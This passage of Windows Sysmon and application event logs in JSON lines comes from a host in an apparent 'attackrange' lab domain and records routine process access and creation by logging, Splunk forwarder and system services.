{"EventTime":"2020-08-01 06:51:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4026,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:51.983\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1107-5F25-0000-00108FC40500}\r\nTargetProcessId: 876\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:51.983","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1107-5F25-0000-00108FC40500}","TargetProcessId":"876","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16384,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12124,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"Successfully scheduled Software Protection service for re-start at 2020-08-08T06:40:52Z. Reason: RulesEngine.","EventReceivedTime":"2020-08-01 06:51:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":903,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12125,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"The Software Protection service has stopped.\r\n","EventReceivedTime":"2020-08-01 06:51:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4027,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.421\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.421","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4028,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.282\r\nProcessGuid: {E2A3D6B1-1108-5F25-0000-001079C60500}\r\nProcessId: 2504\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\" --scheme\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.282","ProcessGuid":"{E2A3D6B1-1108-5F25-0000-001079C60500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\" --scheme","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4029,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.781\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 4372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1108-5F25-0000-001079C60500}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.781","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"4372","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1108-5F25-0000-001079C60500}","TargetProcessId":"2504","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4030,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.781\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.781","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4031,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.781\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.781","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4032,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.781\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:52.781","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4033,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:52.781\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 